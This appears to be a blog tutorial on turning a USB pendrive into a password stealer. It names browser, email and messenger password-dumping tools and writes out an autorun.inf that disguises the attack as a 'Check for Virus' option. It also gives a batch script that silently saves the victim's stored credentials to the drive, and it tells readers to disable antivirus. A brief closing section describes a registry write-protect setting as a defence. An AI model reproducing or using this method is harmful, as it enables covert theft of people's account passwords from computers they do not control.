How to turn your pendrive into a password stealer


Hi friends, now-a-days data transfer through USB drive has become very common be it your collage, office or a friend's place. 
But also be very careful as someone can steal all your data from your computer only by plugging in a USB drive into your computer.

In today's tutorial i'm gonna teach you how to sniff passwords from a computer only by plugging in your pen-drive into a computer and the password's get saved into your USB.

Few tools you need to download for sniffing passwords:


1. IE PassView
- Reveals passwords stored by Internet Explorer

2.Mail PassView
- Reveals passwords stored by any desktop email clients like Mozilla Thunderbird, Microsoft Outlook, Eudora, Netscape, Windows Live Mail etc.

3.PasswordFox
- Reveals passwords stored by the Mozilla Firefox browser.

4.ChromePass
-Reveals passwords stored by Google Chrome Web-browser.

5.Opera PassView
-Reveals passwords stored by Opera Web-browser.

6.MessenPass
-Reveals passwords stored by the following instant messenger applications:
  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby
Download MessenPass

Note: A friend just told me that he can't find the .exe file after extracting the Zip. If you are facing the same problem, I suggest you to deactivate your Antivirus for a while and later activate it again when your USB is ready. This is because many antivirus softwares confuse these password extractor applications as viruses.

How to use these tools to sniff passwords:

1.   First of all you need to download all the above mentioned six applications. Next, as all of them are zipped, you have to unzip(extract) them all and put(only) the .exe files in the root directory of the USB.Next, open Notepad and paste the following code in it and save it in the USB as autorun.inf

[autorun]
open=explode.bat
ACTION= Check for Virus

2.   Now open Notepad again and type the code below and save it as explode.bat

start iepv.exe /stext iepv.txt
start passwordfox.exe /stext passwordfox.txt
start chromepass.exe /stext chromepass.txt
start mailpv.exe /stext mailpv.txt
start operapassview.exe /stext operapassview.txt
start mspass.exe /stext mspass.txt

3.   Bingo, your password stealer USB is finally ready for action.


How to Use it:


When you insert the USB drive into a computer, an autorun screen will appear with the option Check for VirusClick on it and automatically all the passwords will be saved to your USB in .txt files.

How to Protect your PC from this kind of threat:

It is advisable to disable the USB ports of your computer when it is exposed to other users by going to the BIOS setup but this also has its own set of limitations as disabling the USB ports would also disable USB keyboards, USB printers etc.

Hence I've come up with a registry hack which doesn't disable your USB ports but instead disables write access to USB ports so that data cannot be written into pendrives.

Step 1:

Open the Windows Registry by going to 'run' and typing "regedit.exe" and then follow the following path:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Control\StorageDevicePolicies

Now on the right hand panel, right click and add a DWORD Value called WriteProtect and assign its value to 1(assign the value to 0 again to disable write protection on your drives) and you successfully protected your PC from this hack. :)

Take 5 minutes to share this article if you liked it. DO let me know in the comment section below if you have and questions.

Leave a Reply

    Category

    Category

    Category